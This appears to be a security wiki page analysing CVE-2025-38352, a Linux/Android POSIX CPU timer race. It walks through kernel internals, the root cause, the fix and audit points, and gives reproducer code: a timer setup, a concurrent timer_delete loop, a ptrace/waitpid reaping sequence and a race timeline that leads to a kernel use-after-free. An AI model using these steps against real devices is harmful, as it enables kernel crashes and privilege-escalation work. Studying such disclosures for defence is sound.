# POSIX CPU Timers TOCTOU race (CVE-2025-38352)

Tip

Learn and practice AWS hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Check the subscription plans!

Join the 💬 Discord group or the Telegram group, or follow us on Twitter 🐦 @hacktricks_live.

Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud GitHub repos.

This page documents a TOCTOU race condition in Linux/Android POSIX CPU timers that can corrupt timer state and crash the kernel, and that under some circumstances can be steered towards privilege escalation.

- Affected component: kernel/time/posix-cpu-timers.c
- Primitive: expiry vs deletion race under task exit
- Config sensitive: CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n (IRQ-context expiry path)

## Quick internals summary (relevant for exploitation)

Three CPU clocks drive timer accounting via cpu_clock_sample():
- CPUCLOCK_PROF: utime + stime
- CPUCLOCK_VIRT: utime only
- CPUCLOCK_SCHED: task_sched_runtime()

Timer creation wires a timer to a task/pid and initializes the timerqueue nodes:

```c
static int posix_cpu_timer_create(struct k_itimer *new_timer)
{
    struct pid *pid;

    rcu_read_lock();
    pid = pid_for_clock(new_timer->it_clock, false);
    if (!pid) {
        rcu_read_unlock();
        return -EINVAL;
    }
    new_timer->kclock = &clock_posix_cpu;
    timerqueue_init(&new_timer->it.cpu.node);
    new_timer->it.cpu.pid = get_pid(pid);
    rcu_read_unlock();
    return 0;
}
```

Arming inserts the timer into the per-base timerqueue and may update the next-expiry cache:

```c
static void arm_timer(struct k_itimer *timer, struct task_struct *p)
{
    struct posix_cputimer_base *base = timer_base(timer, p);
    struct cpu_timer *ctmr = &timer->it.cpu;
    u64 newexp = cpu_timer_getexpires(ctmr);

    if (!cpu_timer_enqueue(&base->tqhead, ctmr))
        return;
    if (newexp < base->nextevt)
        base->nextevt = newexp;
}
```

The fast path avoids expensive processing unless the cached expiries indicate that a timer may have expired:

```c
static inline bool fastpath_timer_check(struct task_struct *tsk)
{
    struct posix_cputimers *pct = &tsk->posix_cputimers;

    if (!expiry_cache_is_inactive(pct)) {
        u64 samples[CPUCLOCK_MAX];

        task_sample_cputime(tsk, samples);
        if (task_cputimers_expired(samples, pct))
            return true;
    }
    return false;
}
```
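The interaction between arming and the fast path can be sketched as a small userspace model. Nothing here is kernel code: every `model_*` and `MODEL_*` name is hypothetical, and `UINT64_MAX` stands in for "no timer armed" on a clock.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Userspace model only: names mirror the kernel concepts but are hypothetical. */
enum { MODEL_PROF, MODEL_VIRT, MODEL_SCHED, MODEL_CLOCK_MAX };

struct model_cputimers {
    uint64_t nextevt[MODEL_CLOCK_MAX];   /* cached earliest expiry per clock */
};

static void model_init(struct model_cputimers *pct) {
    for (int i = 0; i < MODEL_CLOCK_MAX; i++)
        pct->nextevt[i] = UINT64_MAX;    /* UINT64_MAX means "nothing armed" */
}

/* Arming can only lower the cached expiry, as in the arm_timer() excerpt. */
static void model_arm(struct model_cputimers *pct, int clock, uint64_t expires) {
    if (expires < pct->nextevt[clock])
        pct->nextevt[clock] = expires;
}

/* Fast path: report work only if a sampled clock reached its cached expiry. */
static bool model_fastpath_check(const struct model_cputimers *pct,
                                 const uint64_t samples[MODEL_CLOCK_MAX]) {
    for (int i = 0; i < MODEL_CLOCK_MAX; i++)
        if (pct->nextevt[i] != UINT64_MAX && samples[i] >= pct->nextevt[i])
            return true;
    return false;
}
```

With all samples at 100, the check stays false after arming an expiry of 500 and turns true once an expiry of 90 is armed on any clock, which is why a very short expiry maximizes slow-path entries.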

Expiration collects the expired timers, marks them as firing, and removes them from the queue; actual delivery is deferred:

```c
#define MAX_COLLECTED 20

static u64 collect_timerqueue(struct timerqueue_head *head,
                              struct list_head *firing, u64 now)
{
    struct timerqueue_node *next;
    int i = 0;

    while ((next = timerqueue_getnext(head))) {
        struct cpu_timer *ctmr = container_of(next, struct cpu_timer, node);
        u64 expires = cpu_timer_getexpires(ctmr);

        if (++i == MAX_COLLECTED || now < expires)
            return expires;
        ctmr->firing = 1;                           // critical state
        rcu_assign_pointer(ctmr->handling, current);
        cpu_timer_dequeue(ctmr);
        list_add_tail(&ctmr->elist, firing);
    }
    return U64_MAX;
}
```
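The collection loop can be modelled in userspace to make its bounds visible. This is a sketch under stated assumptions: a sorted array stands in for the timerqueue, and `model_timer`, `model_collect`, and `MODEL_MAX_COLLECTED` are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MODEL_MAX_COLLECTED 20

/* Userspace model: a timer with an expiry and the in-flight flag. */
struct model_timer {
    uint64_t expires;
    int firing;
};

/*
 * queue[] holds n timers sorted by expiry (earliest first).
 * Marks the collected prefix as firing, stores the expiry of the first
 * timer left behind in *next (UINT64_MAX if none), returns the count taken.
 */
static size_t model_collect(struct model_timer *queue, size_t n,
                            uint64_t now, uint64_t *next) {
    size_t taken = 0;
    int i = 0;

    *next = UINT64_MAX;
    while (taken < n) {
        struct model_timer *t = &queue[taken];

        if (++i == MODEL_MAX_COLLECTED || now < t->expires) {
            *next = t->expires;   /* earliest expiry still queued */
            break;
        }
        t->firing = 1;            /* in-flight from here until delivery ends */
        taken++;
    }
    return taken;
}
```

Because the counter is incremented before the comparison, the loop as excerpted stops on the 20th candidate, so a single pass collects at most 19 timers and the rest wait for a later pass.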

## Two expiry-processing modes

- CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y: expiry is deferred via task_work on the target task
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n: expiry is handled directly in IRQ context

Task_work vs IRQ expiry paths

```c
void run_posix_cpu_timers(void)
{
    struct task_struct *tsk = current;

    __run_posix_cpu_timers(tsk);
}

#ifdef CONFIG_POSIX_CPU_TIMERS_TASK_WORK
static inline void __run_posix_cpu_timers(struct task_struct *tsk)
{
    if (WARN_ON_ONCE(tsk->posix_cputimers_work.scheduled))
        return;
    tsk->posix_cputimers_work.scheduled = true;
    task_work_add(tsk, &tsk->posix_cputimers_work.work, TWA_RESUME);
}
#else
static inline void __run_posix_cpu_timers(struct task_struct *tsk)
{
    lockdep_posixtimer_enter();
    handle_posix_cpu_timers(tsk);   // IRQ-context path
    lockdep_posixtimer_exit();
}
#endif
```

In the IRQ-context path, the firing list is processed outside the sighand lock.

IRQ-context delivery loop

```c
static void handle_posix_cpu_timers(struct task_struct *tsk)
{
    struct k_itimer *timer, *next;
    unsigned long flags, start;
    LIST_HEAD(firing);

    if (!lock_task_sighand(tsk, &flags))
        return;   // may fail on exit

    do {
        start = READ_ONCE(jiffies);
        barrier();
        check_thread_timers(tsk, &firing);
        check_process_timers(tsk, &firing);
    } while (!posix_cpu_timers_enable_work(tsk, start));

    unlock_task_sighand(tsk, &flags);   // race window opens here

    list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
        int cpu_firing;

        spin_lock(&timer->it_lock);
        list_del_init(&timer->it.cpu.elist);
        cpu_firing = timer->it.cpu.firing;   // read then reset
        timer->it.cpu.firing = 0;
        if (likely(cpu_firing >= 0))
            cpu_timer_fire(timer);
        rcu_assign_pointer(timer->it.cpu.handling, NULL);
        spin_unlock(&timer->it_lock);
    }
}
```

## Root cause: TOCTOU between IRQ-time expiry and concurrent deletion under task exit

Preconditions

- CONFIG_POSIX_CPU_TIMERS_TASK_WORK is disabled (the IRQ path is in use)
- The target task is exiting but has not been fully reaped yet
- Another thread concurrently calls posix_cpu_timer_del() for the same timer

Sequence

1. update_process_times() triggers run_posix_cpu_timers() in IRQ context for the exiting task.
2. collect_timerqueue() sets ctmr->firing = 1 and moves the timer to the temporary firing list.
3. handle_posix_cpu_timers() drops sighand via unlock_task_sighand() so that timers are delivered outside the lock.
4. Immediately after the unlock, the exiting task can be reaped; a sibling thread executes posix_cpu_timer_del().
5. In this window, posix_cpu_timer_del() may fail to acquire state via cpu_timer_task_rcu()/lock_task_sighand() and therefore skips the normal in-flight guard that checks timer->it.cpu.firing. Deletion proceeds as if the timer were not firing, corrupting state while expiry is still being handled, which leads to crashes/UB.
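The ordering problem can be replayed deterministically in a single-threaded userspace model. This is only an illustration of the check-then-act gap, not kernel code: all `model_*` and `MODEL_*` names are hypothetical, and a boolean stands in for whether lock_task_sighand() would succeed.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Userspace model of the state involved; not kernel code. */
struct model_task  { bool has_sighand; };   /* false once the task was reaped */
struct model_timer { int firing; bool freed; struct model_task *task; };

enum { MODEL_DEL_OK = 0, MODEL_DEL_RETRY = 1 };

/* Expiry side: the timer is marked in-flight while sighand is still held. */
static void model_collect(struct model_timer *t) { t->firing = 1; }

/* Reaping side: after this, every later sighand lookup fails. */
static void model_release_task(struct model_task *tsk) { tsk->has_sighand = false; }

/* Deletion only consults ->firing when the sighand lock could be taken. */
static int model_timer_del(const struct model_timer *t) {
    if (t->task->has_sighand && t->firing)
        return MODEL_DEL_RETRY;   /* normal guard: expiry still in progress */
    return MODEL_DEL_OK;          /* lock failed or not firing: success */
}

/* Frees the object whenever deletion reports success; false means "retry". */
static bool model_timer_delete(struct model_timer *t) {
    if (model_timer_del(t) == MODEL_DEL_RETRY)
        return false;
    t->freed = true;
    return true;
}

/* True when the expiry side would still touch a timer that was freed. */
static bool model_expiry_uses_freed(const struct model_timer *t) {
    return t->firing && t->freed;
}
```

Replaying collect, then a delete attempt, then release_task, then delete again shows the first delete being refused and the second succeeding while `firing` is still set, which is the state the real expiry loop later dereferences.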

### How release_task() and timer_delete() free firing timers

Even after handle_posix_cpu_timers() has taken the timer off the task list, a ptraced zombie can still be reaped. The waitpid() stack drives release_task() → __exit_signal(), which tears down sighand and the signal queues while another CPU still holds pointers to the timer object:

```c
static void __exit_signal(struct task_struct *tsk)
{
    struct sighand_struct *sighand = lock_task_sighand(tsk, NULL);

    // ... signal cleanup elided ...
    tsk->sighand = NULL;             // makes future lock_task_sighand() fail
    unlock_task_sighand(tsk, NULL);
}
```

Even once sighand has been detached, timer_delete() still returns success, because posix_cpu_timer_del() leaves ret = 0 when locking fails, so the syscall goes on to free the object via RCU:

```c
static int posix_cpu_timer_del(struct k_itimer *timer)
{
    struct sighand_struct *sighand = lock_task_sighand(p, &flags);

    if (unlikely(!sighand))
        goto out;                   // ret stays 0 -> userland sees success
    // ... normal unlink path ...
}

SYSCALL_DEFINE1(timer_delete, timer_t, timer_id)
{
    if (timer_delete_hook(timer) == TIMER_RETRY)
        timer = timer_wait_running(timer, &flags);
    posix_timer_unhash_and_free(timer);            // call_rcu(k_itimer_rcu_free)
    return 0;
}
```

Because the slab object is RCU-freed while IRQ context is still walking the firing list, reuse of the timer cache becomes a UAF primitive.

### Steering reaping with ptrace + waitpid

The easiest way to keep a zombie around without it being auto-reaped is to ptrace a non-leader worker thread. exit_notify() first sets exit_state = EXIT_ZOMBIE and only transitions to EXIT_DEAD if autoreap is true. For ptraced threads, autoreap = do_notify_parent() stays false as long as SIGCHLD is not ignored, so release_task() only runs when the parent explicitly calls waitpid():

- Use pthread_create() inside the tracee so the victim is not the thread-group leader (wait_task_zombie() handles ptraced non-leaders).
- The parent issues ptrace(PTRACE_ATTACH, tid) and later runs waitpid(tid, __WALL) to drive do_wait_pid() → wait_task_zombie() → release_task().
- Pipes or shared memory convey the exact TID to the parent so the right worker can be reaped on demand.

This choreography guarantees a window in which handle_posix_cpu_timers() can still reference tsk->sighand, while a subsequent waitpid() tears it down and lets timer_delete() reclaim the same k_itimer object.
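The reaping half of this choreography is ordinary ptrace behaviour and can be observed without any timers. The sketch below shows only that part, under assumptions: `reap_traced_worker`, `child_main`, `worker`, and the single-byte go-ahead protocol are hypothetical, and a return value of 1 is used for environments where ptrace is denied (for example by Yama or seccomp).

```c
#define _GNU_SOURCE
#include <assert.h>
#include <pthread.h>
#include <signal.h>
#include <sys/ptrace.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

static int c2p[2], p2c[2];   /* child->parent and parent->child pipes */

/* Worker (non-leader thread): publish its TID, wait for the go-ahead, exit. */
static void *worker(void *arg) {
    pid_t tid = (pid_t)syscall(SYS_gettid);
    char go;

    (void)arg;
    if (write(c2p[1], &tid, sizeof(tid)) != (ssize_t)sizeof(tid))
        _exit(2);
    if (read(p2c[0], &go, 1) != 1)       /* blocks until the tracer says go */
        _exit(2);
    return NULL;                         /* thread exit: becomes a traced zombie */
}

/* Child process: spawn the worker, then idle so the thread group stays alive. */
static void child_main(void) {
    pthread_t th;

    close(c2p[0]);
    close(p2c[1]);
    if (pthread_create(&th, NULL, worker, NULL) != 0)
        _exit(2);
    for (;;)
        pause();
}

/* Returns 0 if the traced worker was reaped by TID, 1 if ptrace is not
 * permitted here, -1 on any other failure. */
static int reap_traced_worker(void) {
    pid_t child, tid = 0;
    int status = 0, attached = 0, rc = -1;

    if (pipe(c2p) != 0 || pipe(p2c) != 0)
        return -1;
    child = fork();
    if (child < 0)
        return -1;
    if (child == 0)
        child_main();                    /* never returns */
    close(c2p[1]);
    close(p2c[0]);

    if (read(c2p[0], &tid, sizeof(tid)) != (ssize_t)sizeof(tid))
        goto out;
    if (ptrace(PTRACE_ATTACH, tid, NULL, NULL) != 0) {
        rc = 1;
        goto out;
    }
    attached = 1;
    if (waitpid(tid, &status, __WALL) != tid || !WIFSTOPPED(status))
        goto out;                        /* expected: the attach stop */
    if (ptrace(PTRACE_CONT, tid, NULL, NULL) != 0)
        goto out;
    if (write(p2c[1], "x", 1) != 1)      /* let the worker return and exit */
        goto out;
    /* The traced zombie stays around until the tracer waits for it by TID. */
    if (waitpid(tid, &status, __WALL) == tid && WIFEXITED(status)) {
        attached = 0;
        rc = 0;
    }
out:
    kill(child, SIGKILL);
    if (attached)
        waitpid(tid, NULL, __WALL);      /* reap a tracee not reaped above */
    waitpid(child, NULL, 0);
    close(c2p[0]);
    close(p2c[1]);
    return rc;
}
```

The second `waitpid(tid, ..., __WALL)` is the call that corresponds to the release_task() step in the text; until it runs, the worker remains a zombie even though the rest of the thread group is alive. Older glibc versions may need `-lpthread` at link time.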

## Why TASK_WORK mode is safe by design

- With CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y, expiry is deferred to task_work; exit_task_work runs before exit_notify, so there is no IRQ-time overlap with reaping.
- Even then, if the task is already exiting, task_work_add() fails; gating on exit_state makes both modes consistent.

## Fix (Android common kernel) and rationale

Add an early return if the current task is exiting, gating all processing:

```c
// kernel/time/posix-cpu-timers.c (Android common kernel commit 157f357d50b5038e5eaad0b2b438f923ac40afeb)
if (tsk->exit_state)
    return;
```

This prevents exiting tasks from entering handle_posix_cpu_timers(), eliminating the window in which posix_cpu_timer_del() could miss it.cpu.firing and race with expiry processing.
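The effect of the gate can be shown with a very small userspace model. It is a sketch with hypothetical names (`model_task`, `model_timer`, `model_run_cpu_timers`), where setting `firing` stands in for the whole collection step.

```c
#include <assert.h>
#include <stdbool.h>

/* Userspace model; exit_state is nonzero once the task is a zombie or dead. */
struct model_task  { int exit_state; };
struct model_timer { int firing; };

/* Models the patched entry point: exiting tasks never start expiry. */
static bool model_run_cpu_timers(const struct model_task *tsk,
                                 struct model_timer *t) {
    if (tsk->exit_state)
        return false;   /* the added gate: nothing is collected */
    t->firing = 1;      /* stands in for collect_timerqueue() */
    return true;
}
```

Since no timer can enter the firing state on behalf of a task that is already exiting, a later deletion that fails to lock sighand no longer has an in-flight expiry to miss.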

## Impact

Kernel memory corruption of timer structures during concurrent expiry/deletion can cause immediate crashes (DoS), and it is a strong primitive towards privilege escalation because of the opportunities it offers for arbitrary kernel-state manipulation.

## Triggering the bug (safe, reproducible conditions)

Build/config

Ensure CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n and use a kernel without the exit_state gating fix. On x86/arm64 the option is normally forced on via HAVE_POSIX_CPU_TIMERS_TASK_WORK, so researchers often patch kernel/time/Kconfig to expose a manual toggle:

```
config POSIX_CPU_TIMERS_TASK_WORK
    bool "CVE-2025-38352: POSIX CPU timers task_work toggle" if EXPERT
    depends on POSIX_TIMERS && HAVE_POSIX_CPU_TIMERS_TASK_WORK
    default y
```

This mirrors what Android vendors did for analysis builds; upstream x86_64 and arm64 force HAVE_POSIX_CPU_TIMERS_TASK_WORK=y, so the vulnerable IRQ path mainly exists on 32-bit Android kernels where the option is compiled out.

Run on a multi-core VM (e.g., QEMU -smp cores=4) so parent, child main, and worker threads can stay pinned to dedicated CPUs.

Runtime strategy

- Target a thread that is about to exit and attach a CPU timer to it (per-thread or process-wide clock):
  - For per-thread: timer_create(CLOCK_THREAD_CPUTIME_ID, …)
  - For process-wide: timer_create(CLOCK_PROCESS_CPUTIME_ID, …)
- Set a very short initial expiration and a small interval to maximize IRQ-path entries:

```c
static timer_t t;

static void setup_cpu_timer(void) {
    struct sigevent sev = {0};
    sev.sigev_notify = SIGEV_SIGNAL;    // delivery type not critical for the race
    sev.sigev_signo = SIGUSR1;
    if (timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &t))
        perror("timer_create");

    struct itimerspec its = {0};
    its.it_value.tv_nsec = 1;           // fire ASAP
    its.it_interval.tv_nsec = 1;        // re-fire
    if (timer_settime(t, 0, &its, NULL))
        perror("timer_settime");
}
```

From a sibling thread, concurrently delete the same timer while the target thread exits:

```c
void *deleter(void *arg) {
    for (;;)
        (void)timer_delete(t);          // hammer delete in a loop
}
```

Race amplifiers: a high scheduler tick rate, CPU load, and repeated thread exit/re-create cycles. The crash typically manifests when posix_cpu_timer_del() fails to notice firing because the task lookup/locking fails right after unlock_task_sighand().

### Practical PoC orchestration

#### Thread & IPC choreography

A reliable reproducer forks into a ptracing parent and a child that spawns the vulnerable worker thread. Two pipes (c2p, p2c) deliver the worker TID and gate each phase, while a pthread_barrier_t keeps the worker from arming its timer until the parent has attached. Each process or thread is pinned with sched_setaffinity() (e.g., parent on CPU1, child main on CPU0, worker on CPU2) to minimize scheduler noise and keep the race reproducible.
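The two supporting primitives, CPU pinning and passing a TID through a pipe, can be sketched in isolation. The helper names `pin_to_first_allowed_cpu` and `tid_roundtrip` are hypothetical, and picking the first allowed CPU is an assumption made so the sketch also works inside restricted cpusets; a reproducer would pin each actor to a different, fixed CPU.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

/* Pin the calling thread to the first CPU it is currently allowed to use.
 * Returns that CPU number, or -1 on error. */
static int pin_to_first_allowed_cpu(void) {
    cpu_set_t allowed, one;

    if (sched_getaffinity(0, sizeof(allowed), &allowed) != 0)
        return -1;
    for (int cpu = 0; cpu < CPU_SETSIZE; cpu++) {
        if (!CPU_ISSET(cpu, &allowed))
            continue;
        CPU_ZERO(&one);
        CPU_SET(cpu, &one);
        return sched_setaffinity(0, sizeof(one), &one) == 0 ? cpu : -1;
    }
    return -1;
}

/* Send the caller's kernel TID through a pipe and read it back.
 * In a reproducer the two pipe ends would live in different processes.
 * Returns the TID that was read, or -1 on error. */
static pid_t tid_roundtrip(void) {
    int fds[2];
    pid_t tid = (pid_t)syscall(SYS_gettid), got = -1;

    if (pipe(fds) != 0)
        return -1;
    if (write(fds[1], &tid, sizeof(tid)) != (ssize_t)sizeof(tid) ||
        read(fds[0], &got, sizeof(got)) != (ssize_t)sizeof(got))
        got = -1;
    close(fds[0]);
    close(fds[1]);
    return got;
}
```

The kernel TID from `SYS_gettid` is what ptrace and waitpid expect for a specific thread, which is why it is sent rather than a pthread_t handle.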

#### Timer calibration with CLOCK_THREAD_CPUTIME_ID

The worker arms a per-thread CPU timer so that only its own CPU consumption advances the deadline. A tunable wait_time (default ≈250 µs of CPU time) plus a bounded busy loop ensure that exit_notify() sets EXIT_ZOMBIE while the timer is just about to fire:

<details>
<summary>Minimal per-thread CPU timer skeleton</summary>

```c
#include <pthread.h>
#include <signal.h>
#include <stdio.h>
#include <time.h>

static pthread_barrier_t barrier;   // initialized by child main (not shown)
static timer_t timer;
static long wait_time = 250000;     // nanoseconds of CPU time

static void timer_fire(sigval_t unused) { puts("timer fired"); }

static void *worker(void *arg) {
    struct sigevent sev = {0};
    sev.sigev_notify = SIGEV_THREAD;
    sev.sigev_notify_function = timer_fire;
    timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer);

    struct itimerspec ts = {
        .it_interval = {0, 0},
        .it_value = {0, wait_time},
    };

    pthread_barrier_wait(&barrier);   // released by child main after ptrace attach
    timer_settime(timer, 0, &ts, NULL);

    for (volatile int i = 0; i < 1000000; i++);   // burn CPU before exiting
    return NULL;                                   // do_exit() keeps burning CPU
}
```

</details>

#### Race timeline
1. The child tells the parent the worker TID via `c2p`, then blocks on the barrier.
2. The parent issues `PTRACE_ATTACH`, waits in `waitpid(__WALL)`, then uses `PTRACE_CONT` to let the worker run and exit.
3. When heuristics (or manual operator input) suggest that the timer has been collected into the IRQ-side `firing` list, the parent runs `waitpid(tid, __WALL)` again to trigger release_task() and drop `tsk->sighand`.
4. The parent signals the child over `p2c` so that child main can call `timer_delete(timer)` and immediately run a helper such as `wait_for_rcu()` that waits until the timer's RCU callback has completed.
5. IRQ context eventually resumes `handle_posix_cpu_timers()` and dereferences the freed `struct k_itimer`, tripping KASAN or WARN_ON()s.

#### Optional kernel instrumentation
For research setups, injecting a debug-only `mdelay(500)` inside handle_posix_cpu_timers() when `tsk->comm == "SLOWME"` widens the window so that the choreography above almost always wins the race. The same PoC also renames threads (`prctl(PR_SET_NAME, ...)`) so that kernel logs and breakpoints can confirm that the expected worker is really the one being reaped.
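The userspace half of this instrumentation is a plain prctl() call. The sketch below uses a hypothetical helper, `rename_current_thread`, that sets the calling thread's name and reads it back. Note that the `tsk->comm == "SLOWME"` condition in the text is shorthand: in C that expression compares pointers, so an actual debug patch would presumably compare the strings instead.

```c
#include <assert.h>
#include <string.h>
#include <sys/prctl.h>

/* Rename the calling thread and read the name back.
 * Returns 0 when the kernel reports the requested name, -1 otherwise. */
static int rename_current_thread(const char *name) {
    char now[16] = {0};   /* thread names are at most 16 bytes including NUL */

    if (prctl(PR_SET_NAME, (unsigned long)name, 0, 0, 0) != 0)
        return -1;
    if (prctl(PR_GET_NAME, (unsigned long)now, 0, 0, 0) != 0)
        return -1;
    /* Longer names are truncated by the kernel, so compare 15 bytes at most. */
    return strncmp(now, name, sizeof(now) - 1) == 0 ? 0 : -1;
}
```

Calling `rename_current_thread("SLOWME")` from the worker before it arms its timer makes that thread identifiable in kernel logs without affecting the other threads of the process.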

### Instrumentation cues during exploitation
- Add tracepoints/WARN_ONCE around unlock_task_sighand()/posix_cpu_timer_del() to catch cases where `it.cpu.firing==1` coincides with a failed cpu_timer_task_rcu()/lock_task_sighand(); monitor timerqueue consistency while the victim exits.
- KASAN typically reports `slab-use-after-free` inside posix_timer_queue_signal(), while non-KASAN kernels log a WARN_ON_ONCE() from send_sigqueue() when the race lands, which gives a quick success indicator.

## Audit hotspots (for reviewers)
- update_process_times() → run_posix_cpu_timers() (IRQ)
- __run_posix_cpu_timers() selection (TASK_WORK vs IRQ path)
- collect_timerqueue(): sets ctmr->firing and moves nodes
- handle_posix_cpu_timers(): drops sighand before firing loop
- posix_cpu_timer_del(): relies on it.cpu.firing to detect in-flight expiry; this check is skipped when task lookup/lock fails during exit/reap

## Notes for exploitation research
- The disclosed behavior is a reliable kernel crash primitive; turning it into privilege escalation typically needs an additional controllable overlap (object lifetime or write-what-where influence) beyond the scope of this summary. Treat any PoC as potentially destabilizing and run only in emulators/VMs.

## References
- [Race Against Time in the Kernel’s Clockwork (StreyPaws)](https://streypaws.github.io/posts/Race-Against-Time-in-the-Kernel-Clockwork/)
- [Android security bulletin – September 2025](https://source.android.com/docs/security/bulletin/2025-09-01)
- [Android common kernel patch commit 157f357d50b5…](https://android.googlesource.com/kernel/common/+/157f357d50b5038e5eaad0b2b438f923ac40afeb%5E%21/#F0)
- [CVE-2025-38352 – In-the-wild Android Kernel Vulnerability Analysis and PoC](https://faith2dxy.xyz/2025-12-22/cve_2025_38352_analysis/)
- [poc-CVE-2025-38352 (GitHub)](https://github.com/farazsth98/poc-CVE-2025-38352)
- [Linux stable fix commit f90fff1e152d](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=f90fff1e152dedf52b932240ebbd670d83330eca)
